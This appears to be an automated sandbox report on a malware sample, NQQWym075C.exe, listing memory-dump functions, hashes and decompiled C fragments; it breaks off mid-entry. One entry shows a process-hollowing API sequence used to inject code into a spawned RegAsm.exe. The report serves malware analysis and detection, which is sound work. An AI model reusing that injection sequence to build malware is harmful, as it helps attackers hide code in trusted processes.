Instruction Fuzzy Hash: 3AB092343029408FCE56DF18C080B2533F8BB46A40B8800D0E400CBA20D329E8008900

Uniqueness

Uniqueness Score: -1.00%

Function 03042ACB, Relevance: .0, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03042ACB() {
				void* _t5;

				return E0302EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}

0x03042adc

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction ID: 0c055b30d6b9591256185b286107d842e044d4f8c58e3431f27cf99ba68520c1
Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
Instruction Fuzzy Hash: 59B01233C52550CFCF03EF40C610B5AB731FB80750F054490A0012B930C228AC01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 03059B00, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac1e2360e8126522e5d287068bb9ac374b69c94990aa95cfb4a5b57e1d541b3c
Instruction ID: be03298aa2c0d0f761cfc58d9ee0aa3bafbf1f0a7499d83b24bceedf6e3d0dbc
Opcode Fuzzy Hash: ac1e2360e8126522e5d287068bb9ac374b69c94990aa95cfb4a5b57e1d541b3c
Instruction Fuzzy Hash: 3C90026134204D02D140B15AC4147070146D7D0651F51C011A0014554D8B56896576F1

Uniqueness

Uniqueness Score: -1.00%

Function 0305A3B0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12b4c7af6cc3e3279c5835a9a7bb4c03e4a3055880f182b216c943c534cc6f6b
Instruction ID: fd1bc2b405d385d966dedaa5a909e192732b06be1c556016e20ef30b4edf4300
Opcode Fuzzy Hash: 12b4c7af6cc3e3279c5835a9a7bb4c03e4a3055880f182b216c943c534cc6f6b
Instruction Fuzzy Hash: 8F90027130248902D140B15AC44460B5145A7E0351F51C411E0415554C8B558856A261

Uniqueness

Uniqueness Score: -1.00%

Function 03059A10, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d821a2bcac7107c4bdde47a1646f71207f08d81631a93872914852fdb4c21b80
Instruction ID: 21cb573ce0ad3addce8e14eea3209c7cfc1ae79c0686926c1f3847273734031c
Opcode Fuzzy Hash: d821a2bcac7107c4bdde47a1646f71207f08d81631a93872914852fdb4c21b80
Instruction Fuzzy Hash: 3C90027130244D02D100A15A8808747014597D0352F51C011A5154555E8BA5C8917571

Uniqueness

Uniqueness Score: -1.00%

Function 03059A80, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61d43de2abb95db513114f37c2110d13c574a116b66b1a2c2fe46753bac337eb
Instruction ID: 91b3ef89dab03485da47b201a75651dab0ceac58605635799ba1a944de96503d
Opcode Fuzzy Hash: 61d43de2abb95db513114f37c2110d13c574a116b66b1a2c2fe46753bac337eb
Instruction Fuzzy Hash: 3890026130248D42D140A25A8804B0F424597E1252F91C019A4146554CCE5588556761

Uniqueness

Uniqueness Score: -1.00%

Function 03059950, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d7cb4a539903ba9ea80b9294bc79524bf621d97e2bde88470e1363a37ea679d
Instruction ID: 70614dceca6f849eb7f5189e2157a4f0b54c5ec79edf8764bc1090cb9534629c
Opcode Fuzzy Hash: 8d7cb4a539903ba9ea80b9294bc79524bf621d97e2bde88470e1363a37ea679d
Instruction Fuzzy Hash: C19002A130244D03D140A55A8804607014597D0352F51C011A2054555E8F698C517175

Uniqueness

Uniqueness Score: -1.00%

Function 030599D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4c16109d67de90fc1b4ef4514c902097d5e8f7da09c8e7173a0ca314e38a182
Instruction ID: ec2630ac94088a243acf85d794cecc4ba2c03b8d9302c90646877a9a4209c19a
Opcode Fuzzy Hash: e4c16109d67de90fc1b4ef4514c902097d5e8f7da09c8e7173a0ca314e38a182
Instruction Fuzzy Hash: 359002A131204942D104A15A8404706018597E1251F51C012A2144554CCA698C616165

Uniqueness

Uniqueness Score: -1.00%

Function 03059820, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfeeb29b99dedaf8ceae09eee9c74a54e10eaf09a331a242ab71b60f5da60383
Instruction ID: 740fcc87b74029283f6c33df662fd939734f1bfe176bb7243658c2aaedf7893b
Opcode Fuzzy Hash: dfeeb29b99dedaf8ceae09eee9c74a54e10eaf09a331a242ab71b60f5da60383
Instruction Fuzzy Hash: 2E90027134204D02D141B15A84046060149A7D0291F91C012A0414554E8B958A56BAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0305B040, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9d3466b2a04b27e96b97a6d27e926e3cc7a54643fd24cec3a6c1bfd8ba1717c
Instruction ID: d63ca1b97cbe530f194a07cd9d7832f5d35ba64461b5cbd93da3946d742e15fb
Opcode Fuzzy Hash: e9d3466b2a04b27e96b97a6d27e926e3cc7a54643fd24cec3a6c1bfd8ba1717c
Instruction Fuzzy Hash: 909002A1702189434540F15A88044065155A7E1351391C121A0444560C8BA88855A2A5

Uniqueness

Uniqueness Score: -1.00%

Function 030598A0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 877391696239203d3bb26312261aa86fbcf5dd3eca6702bf5d27d29f6a096e7a
Instruction ID: 5a1123a1f8dad36c4b5787fdff4ac664274070964659fbf256c58a3360955335
Opcode Fuzzy Hash: 877391696239203d3bb26312261aa86fbcf5dd3eca6702bf5d27d29f6a096e7a
Instruction Fuzzy Hash: E490026130204D02D102A15A84146060149D7D1395F91C012E1414555D8B658953B172

Uniqueness

Uniqueness Score: -1.00%

Function 0305A710, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80bdbd02cfee7402eac7cea0cc150b42e2f4274b30fdd0708ce93000dd5a9380
Instruction ID: 67a412c92890b045f239f343ff161f26821c6e0e2863fe943e74dd5b8347cd20
Opcode Fuzzy Hash: 80bdbd02cfee7402eac7cea0cc150b42e2f4274b30fdd0708ce93000dd5a9380
Instruction Fuzzy Hash: 66900271302049529500E69A9804A4A424597F0351B51D015A4004554C8A9488616161

Uniqueness

Uniqueness Score: -1.00%

Function 03059730, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78a901ce53f33d394a784526fb810b4c69eb1f5e5a255947c52ccdd157cd864d
Instruction ID: 85bca68a55b0e93cc044b2b0323482a98a313f4f02c5d164e3760f98f87c135b
Opcode Fuzzy Hash: 78a901ce53f33d394a784526fb810b4c69eb1f5e5a255947c52ccdd157cd864d
Instruction Fuzzy Hash: 7590026170604D02D140B15A9418706015597D0251F51D011A0014554DCB998A5576E1

Uniqueness

Uniqueness Score: -1.00%

Function 03059760, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17ba37d3170ad1bd2bda48b0605c56b5a694ac6ac51f98dd4270a6684f145bc4
Instruction ID: ccacff01f9054ffaa533cd55c6064534ddc233c1801d074d8741693f3e80c302
Opcode Fuzzy Hash: 17ba37d3170ad1bd2bda48b0605c56b5a694ac6ac51f98dd4270a6684f145bc4
Instruction Fuzzy Hash: B090027130204D03D100A15A9508707014597D0251F51D411A0414558DDB9688517161

Uniqueness

Uniqueness Score: -1.00%

Function 03059770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45ea3b740434ab15438572a08e551b2e01b07258e0ff6c53baa15cf77ff0e9fe
Instruction ID: 01bab704421f4d9a2845d6adff0fabb12d60d7c5abacef5c86c2222efd99b06d
Opcode Fuzzy Hash: 45ea3b740434ab15438572a08e551b2e01b07258e0ff6c53baa15cf77ff0e9fe
Instruction Fuzzy Hash: EB90026130608D42D100A55A9408A06014597D0255F51D011A1054595DCB758851B171

Uniqueness

Uniqueness Score: -1.00%

Function 0305A770, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2913c405c7aaf6c237718f7d975c1469bfd5446c9e0079cc17796b8ee3f4eb02
Instruction ID: cfce68cd6fcdfeb70e97d2916441ce0adb02fefd614b9819595594dd4dbcc2c6
Opcode Fuzzy Hash: 2913c405c7aaf6c237718f7d975c1469bfd5446c9e0079cc17796b8ee3f4eb02
Instruction Fuzzy Hash: 4590027530608D42D500A55A9804A87014597D0355F51D411A041459CD8B948861B161

Uniqueness

Uniqueness Score: -1.00%

Function 03059610, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 243cee8907ed96ee0f18ee0ba9a1ad99387198da02344362329feee8db6e25f7
Instruction ID: cfb3a45703ecd4b91f83120c731b76dc356596001a7318fe7a15e9a0b8cb11c4
Opcode Fuzzy Hash: 243cee8907ed96ee0f18ee0ba9a1ad99387198da02344362329feee8db6e25f7
Instruction Fuzzy Hash: 4090027170604D02D150B15A8414746014597D0351F51C011A0014654D8B958A5576E1

Uniqueness

Uniqueness Score: -1.00%

Function 03059650, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5848e80c2e0066180e6819f28d09cf3c1d4af8d2d357bc166d69005b48ff779
Instruction ID: 0125cd76b7a99c06f27e9a510ee70cd50c8c2b4a64466368c07a08a73c8c40f5
Opcode Fuzzy Hash: e5848e80c2e0066180e6819f28d09cf3c1d4af8d2d357bc166d69005b48ff779
Instruction Fuzzy Hash: F490027130608D42D140B15A8404A46015597D0355F51C011A0054694D9B658D55B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 030596D0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 854459cc0a338b446867ae9a3eb06c34ffa24b0a2b7b91c65e8145d703a0eb6f
Instruction ID: 6c84df7e80404d7299fe58258a27473ad80805ae622be47826d7f561d15f0084
Opcode Fuzzy Hash: 854459cc0a338b446867ae9a3eb06c34ffa24b0a2b7b91c65e8145d703a0eb6f
Instruction Fuzzy Hash: CF90027130204D42D100A15A8404B46014597E0351F51C016A0114654D8B55C8517561

Uniqueness

Uniqueness Score: -1.00%

Function 03059520, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ee73b3771aa2da589a0f6eb73ebed7d8eacee6c2f914d63e48a964397966ada
Instruction ID: e8471dbb909a0337d1bfaa71d8a487890a9649f0ce36513bf93ea86180de7703
Opcode Fuzzy Hash: 6ee73b3771aa2da589a0f6eb73ebed7d8eacee6c2f914d63e48a964397966ada
Instruction Fuzzy Hash: 9A9002E1302189924500E25AC404B0A464597E0251B51C016E1044560CCA658851A175

Uniqueness

Uniqueness Score: -1.00%

Function 0305AD30, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8129937b447ae14996c42c35e0f96dfb8286b2f48d27132931d034632633fd95
Instruction ID: ba0660dd2e2bb564d9dcafe8b07130358c671afc99c6a7bf4949faee2d11e671
Opcode Fuzzy Hash: 8129937b447ae14996c42c35e0f96dfb8286b2f48d27132931d034632633fd95
Instruction Fuzzy Hash: 5F900271B06049129140B15A88146464146A7E0791B55C011A0504554C8E948A5563E1

Uniqueness

Uniqueness Score: -1.00%

Function 03059560, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b21b1e31a81890142905a8f1537d4b0363f49c47155c4725760bbc4c92a7460
Instruction ID: 18f171fe69cfc2a37b42d2a4b2298f729069c251a4ccd669e8b0074d9027e0a0
Opcode Fuzzy Hash: 7b21b1e31a81890142905a8f1537d4b0363f49c47155c4725760bbc4c92a7460
Instruction Fuzzy Hash: 01900265322049020145E55A460450B0585A7D63A1391C015F1406590CCB6188656361

Uniqueness

Uniqueness Score: -1.00%

Function 030595F0, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c69e9f1ddf8a06b7f1da502cc5c9c6dbe079f8aa5d63acfed9d5b0ff671ee1bc
Instruction ID: 93e2cc9c18ae78655ad03f0c94539f37cb5270ea8a4b52c45ab5e9283ebab04d
Opcode Fuzzy Hash: c69e9f1ddf8a06b7f1da502cc5c9c6dbe079f8aa5d63acfed9d5b0ff671ee1bc
Instruction Fuzzy Hash: 0790027130204D02D104A15A8804686014597D0351F51C011A6014655E9BA588917171

Uniqueness

Uniqueness Score: -1.00%

Function 03059670, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: 7e2a3c4cf20bf65f1ecbbad1f386821a0e4e7c3059e5c011fcf3829c045acdc2
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 030AFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E030AFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0305CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E030A5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E030A5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x030afdda
0x030afde2
0x030afde5
0x030afdec
0x030afdfa
0x030afdff
0x030afe0a
0x030afe0f
0x030afe17
0x030afe1e
0x030afe19
0x030afe19
0x030afe19
0x030afe20
0x030afe21
0x030afe22
0x030afe25
0x030afe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 030AFDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 030AFE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 030AFE2B

Memory Dump Source

Source File: 00000002.00000002.276352542.0000000002FF0000.00000040.00000001.sdmp, Offset: 02FF0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 48a084b842d9de47bd70e5f71d32b9084c5c36da9deb3281c01bf5aced085695
Instruction ID: 9b08ddedfbdaf849198e3879562d55c30294a36e9ac0638369cb1e80544c5b7e
Opcode Fuzzy Hash: 48a084b842d9de47bd70e5f71d32b9084c5c36da9deb3281c01bf5aced085695
Instruction Fuzzy Hash: 9DF0FC36141601BFE6209A89EC05F77BF5EEB85730F140315F668591D1E962F82086F4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: NQQWym075C.exe PID: 1744 Parent PID: 5264 NQQWym075C.exeCOMMON

Executed Functions

Function 05FD1C09, Relevance: 15.2, APIs: 10, Instructions: 225nativethreadprocessCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 05FD1CB7
NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 05FD1CDC
NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 05FD1CF6
NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 05FD1D41
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 05FD1D66
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 05FD1DA9
NtWriteVirtualMemory.NTDLL(?,?,?,00000004,?), ref: 05FD1E36
NtGetContextThread.NTDLL(?,?), ref: 05FD1E50
NtSetContextThread.NTDLL(?,00010007), ref: 05FD1E74
NtResumeThread.NTDLL(?,00000000), ref: 05FD1E86

Memory Dump Source

Source File: 00000004.00000002.498581226.0000000005FD0000.00000040.00000001.sdmp, Offset: 05FD0000, based on PE: false

Similarity

API ID: SectionThread$ContextCreateMemoryProcessViewVirtual$InformationQueryReadResumeWrite
String ID:
API String ID: 3307612235-0
Opcode ID: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
Instruction ID: 29e24151a4477207beea7492d10e45c28bc65dbd7d39f3b2e8f9e2f437ba1ba6
Opcode Fuzzy Hash: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
Instruction Fuzzy Hash: C991E371A00248AFDF21DFA5CC88EEEBBB9FF49705F044059FA09EA150D735AA44DB60

Uniqueness

Uniqueness Score: -1.00%

Function 05FD00AD, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 92nativeCOMMON

Download Yara Rule

APIs

NtOpenSection.NTDLL(?,0000000C,?), ref: 05FD0199
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000002), ref: 05FD01B8

Strings

en, xrefs: 05FD0150
NtMapViewOfSectionNtOpenSection, xrefs: 05FD0128, 05FD012B
@, xrefs: 05FD018C
wcsl, xrefs: 05FD0149
NtOpenSection, xrefs: 05FD011D, 05FD0120

Memory Dump Source

Source File: 00000004.00000002.498581226.0000000005FD0000.00000040.00000001.sdmp, Offset: 05FD0000, based on PE: false

Similarity

API ID: Section$OpenView
String ID: @$NtMapViewOfSectionNtOpenSection$NtOpenSection$en$wcsl
API String ID: 2380476227-2634024955
Opcode ID: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
Instruction ID: acebbe826ba5177a5394f4b3bee291fd0dc040e23339bcc6f9bfd3f2c28737e7
Opcode Fuzzy Hash: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
Instruction Fuzzy Hash: BD3127B1D00258AFCB10CFD4C889ADEBBB9FF08750F14415AE514EB250EB789A05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02CC9280, Relevance: 1.5, APIs: 1, Instructions: 241memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 02CC9508

Memory Dump Source

Source File: 00000004.00000002.486754751.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: dbeef71267f73bb17a06253a6790773f8d6bff143e5f5f845a2e8765ea058521
Instruction ID: b0401437cc71dc887d4d61331d07790723f0d864a0c3dc5f89e2b0eee98a7a7a
Opcode Fuzzy Hash: dbeef71267f73bb17a06253a6790773f8d6bff143e5f5f845a2e8765ea058521
Instruction Fuzzy Hash: 7681BD31A002059FCB14EBB5C894BAFBBE5AF89314F28856DE519DB381DB35DC05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02CC94A0, Relevance: 1.3, APIs: 1, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 02CC9508

Memory Dump Source

Source File: 00000004.00000002.486754751.0000000002CC0000.00000040.00000001.sdmp, Offset: 02CC0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f4f0bee09d77ed6db36f578072552dd1effa526158374078580c8e1997015432
Instruction ID: 8ade0d73caaad316ac6a7954e4348ca8908a1b558eac29b84d45718042020b66
Opcode Fuzzy Hash: f4f0bee09d77ed6db36f578072552dd1effa526158374078580c8e1997015432
Instruction Fuzzy Hash: 5C1128B59002089FCB10DFAAC884BDFFBF4EB88324F248419E519A7310C775A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0123D0EC, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.485750089.000000000123D000.00000040.00000001.sdmp, Offset: 0123D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c1d60c53a6035d5216112e18b45a782be1436b404fc0ba0989b58cde3dd045c
Instruction ID: 40efba5297d0d2c1b6890645b39535c7cc5891f13d35b0b308dfe3d9dd663b75
Opcode Fuzzy Hash: 2c1d60c53a6035d5216112e18b45a782be1436b404fc0ba0989b58cde3dd045c
Instruction Fuzzy Hash: A82104F5514208EFDB01DF98D8C0B26BB65FB84314F64C9ADE9494B246C376D846CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0123D0E7, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.485750089.000000000123D000.00000040.00000001.sdmp, Offset: 0123D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2843292ebbf6a814d7a2286815bab37d73136ec5010e940f27b85643756957ed
Instruction ID: 395620252eee8c3066a8c70d080884974790055e0b4f35857243506c82498cf1
Opcode Fuzzy Hash: 2843292ebbf6a814d7a2286815bab37d73136ec5010e940f27b85643756957ed
Instruction Fuzzy Hash: AD119DB5904284DFDB02CF58D9C4B15FFB1FB84324F28C6A9D9494B656C33AD44ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0122D041, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.485565631.000000000122D000.00000040.00000001.sdmp, Offset: 0122D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8992db418d5894c1fed4c212a546bedf2dec2e5308a126b41dcd6ea97e4dbe68
Instruction ID: 36c8846766661cf88ba5cbf350c69303c06c5b66ab239477fd7902c66f63915d
Opcode Fuzzy Hash: 8992db418d5894c1fed4c212a546bedf2dec2e5308a126b41dcd6ea97e4dbe68
Instruction Fuzzy Hash: 1701FC71018358AAEB205B65CC8076BBF98EF407A4F188159EE045B257D37D9945C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 0122D040, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.485565631.000000000122D000.00000040.00000001.sdmp, Offset: 0122D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ee26fa6837fc2ea3b0d939ef3394c4680311830b8c522c3fc671825019652ad
Instruction ID: 15e83ea611474880f85c7b7f36c2011673571443496b67f0d4d355328c25d09d
Opcode Fuzzy Hash: 6ee26fa6837fc2ea3b0d939ef3394c4680311830b8c522c3fc671825019652ad
Instruction Fuzzy Hash: CCF0C271404388ABEB108A19CD84B66FF98EB41774F18C05AEE084F287C37D9844CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: RegAsm.exe PID: 5776 Parent PID: 1744 RegAsm.exeCOMMON

Executed Functions

Function 00418180, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418180(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E00418D80(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t11 =  &_a20; // 0x413b57
				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x0041818f
0x00418197
0x004181b9
0x004181cd
0x004181d1

APIs

NtCreateFile.NTDLL(00000060,00408AC3,?,W;A,00408AC3,FFFFFFFF,?,?,FFFFFFFF,00408AC3,00413B57,?,00408AC3,00000060,00000000,00000000), ref: 004181CD

Strings

W;A, xrefs: 004181B9, 004181C4

Memory Dump Source

Source File: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID: W;A
API String ID: 823142352-2883288857
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: fc8cfab2575da1a496486cdbdd5ccf7d074368776fda38d20555821bca86f3ae
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 5CF0B2B2201208ABCB08DF89DC85EEB77ADAF8C754F158248FA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041822A, Relevance: 1.5, APIs: 1, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E0041822A(void* __ecx, signed int __edx, signed int __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t21;
				void* _t34;
				intOrPtr* _t35;
				void* _t37;

				_t33 = __edi &  *(__ecx + 0x550ccce9 + __edx * 2);
				_t16 = _a4;
				_t35 = _a4 + 0xc48;
				E00418D80(_t33, _t16, _t35,  *((intOrPtr*)(_t16 + 0x10)), 0, 0x2a);
				_t21 =  *((intOrPtr*)( *_t35))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _t34, _t37); // executed
				return _t21;
			}

0x0041822a
0x00418233
0x0041823f
0x00418247
0x00418275
0x00418279

APIs

